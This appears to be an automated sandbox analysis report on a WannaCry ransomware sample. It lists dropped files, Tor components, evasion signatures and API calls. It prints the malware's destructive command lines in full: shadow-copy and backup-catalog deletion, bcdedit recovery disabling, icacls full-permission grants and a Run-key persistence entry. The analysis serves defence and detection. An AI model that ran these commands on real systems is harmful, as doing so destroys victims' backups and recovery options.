                  Command shell drops VBS files
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\m.vbsJump to behavior
                  Uses bcdedit to modify the Windows boot settings
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quietJump to behavior
                  Drops PE files to the document folder of the user
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Documents\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Windows\System32\certutil.exeFile created: C:\Users\user\Desktop\WannaCrypt0r.skJump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\u.wnryJump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\Public\Desktop\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Windows\System32\certutil.exeFile created: C:\Users\user\Desktop\WannaCrypt0r.skJump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\taskdl.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libssp-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\AppData\Local\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\u.wnryJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeJump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\Default\Desktop\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Documents\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\ssleay32.dllJump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Desktop\taskse.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libeay32.dllJump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Users\user\Downloads\@WanaDecryptor@.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\tor.exeJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeFile created: C:\Users\user\Desktop\TaskData\Tor\zlib1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SDE14B.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\~SDE14C.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Java\~SDE14D.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\~SDE360.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\~SDE361.tmpJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Creates files in the recycle bin to hide itself
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile created: C:\$Recycle.Bin\~SDDF8D.tmpJump to behavior
                  May use the Tor software to hide its network traffic
                  Source: @WanaDecryptor@.exe, 00000019.00000003.4365502561.000000000289A000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 0000001D.00000000.4371285563.000000000081C000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: onion-port
                  Moves itself to temp directory
                  Source: c:\users\user\desktop\wannacry.cmdFile moved: C:\Users\user\AppData\Local\Temp\30.WNCRYTJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,25_2_004067F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,28_2_004067F0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,37_2_004067F0
                  Source: C:\Users\user\Desktop\taskse.exeCode function: 36_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,LookupPrivilegeValueA,AdjustTokenPrivileges,_local_unwind2,WaitForSingleObject,_local_unwind2,36_2_00401000
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Opens the same file many times (likely Sandbox evasion)
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Desktop\WannaCry.cmd count: 36242Jump to behavior
                  Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Desktop\WANNACRY.bin count: 36237Jump to behavior
                  Contains functionality to detect sleep reduction / modifications
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040D30025_2_0040D300
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040D4C025_2_0040D4C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0040D30028_2_0040D300
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0040D4C028_2_0040D4C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0040D30037_2_0040D300
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0040D4C037_2_0040D4C0
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskse.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskse.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskse.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskse.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskdl.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\taskse.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeDropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeDropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dllJump to dropped file
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeEvaded block: after key decisiongraph_25-5437
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeEvaded block: after key decisiongraph_28-4667
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeEvaded block: after key decisiongraph_28-5519
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeEvaded block: after key decisiongraph_37-5473
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI coverage: 8.5 %
                  Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\taskdl.exeCode function: 10_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,10_2_00401080
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,25_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,25_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,25_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,28_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,28_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,28_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,37_2_004080C0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,37_2_00403CB0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,37_2_004026B0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_25-4857
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_25-4868
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_25-4814
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_25-4692
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_28-4733
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_28-4750
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_28-5467
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_37-5286
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_37-5163
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_37-5262
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeAPI call chain: ExitProcess graph end nodegraph_37-5537
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDE034.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDE033.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SDE037.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SDE038.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\~SDE035.tmpJump to behavior
                  Source: C:\Users\user\Desktop\WannaCrypt0r.skFile opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Temp\~SDE036.tmpJump to behavior
                  Source: certutil.exe, 00000004.00000003.2978492968.000001846EB02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tNuBT9Tmk3XowV5s0DCjjM5QEmUH8y0NScjNfok8ZIiVqq4hLSY37gRClL+z7TIy
                  Source: taskhsvc.exe, 0000001D.00000003.7105840816.00000000042FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4n1U+eznQ3iTAy1smqeMuE/pCIfdVpSJnagimVFQTmQ
                  Source: @WanaDecryptor@.exe, 00000019.00000002.7375727368.00000000004C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
                  Source: taskhsvc.exe, 0000001D.00000003.4423866724.0000000004785000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m 4n1U+eznQ3iTAy1smqeMuE/pCIfdVpSJnagimVFQTmQ
                  Source: taskhsvc.exe, 0000001D.00000003.7105840816.00000000042FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4n1U+eznQ3iTAy1smqeMuE/pCIfdVpSJnagimVFQTmQu2ME
                  Source: @WanaDecryptor@.exe, 0000001C.00000002.4451269270.0000000000797000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,25_2_00404B70
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado!Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbsJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vsJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00401BB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,25_2_00401BB0
                  Source: C:\Windows\SysWOW64\cscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,25_2_00406C20
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,28_2_00406C20
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,37_2_00406C20
                  Source: C:\Windows\SysWOW64\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_00406F80 SendMessageA,CreateSolidBrush,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateFontA,CreateFontA,#1641,CreateFontA,#1641,CreateFontA,#1641,#3092,SendMessageA,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#860,#537,#537,#540,#2818,#535,#2818,#535,SendMessageA,SendMessageA,#6140,#6140,GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,SystemTimeToTzSpecificLocalTime,#2818,SystemTimeToTzSpecificLocalTime,#2818,#6334,#800,25_2_00406F80
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040BED0 #823,GetComputerNameA,GetUserNameA,25_2_0040BED0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 25_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,25_2_0040D6A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 28_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,28_2_0040D6A0
                  Source: C:\Users\user\Desktop\@WanaDecryptor@.exeCode function: 37_2_0040D6A0 htons,socket,bind,ioctlsocket,ioctlsocket,connect,select,__WSAFDIsSet,__WSAFDIsSet,ioctlsocket,setsockopt,setsockopt,setsockopt,closesocket,37_2_0040D6A0

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts12
                  Scripting                  		1
                  DLL Side-Loading                  		1
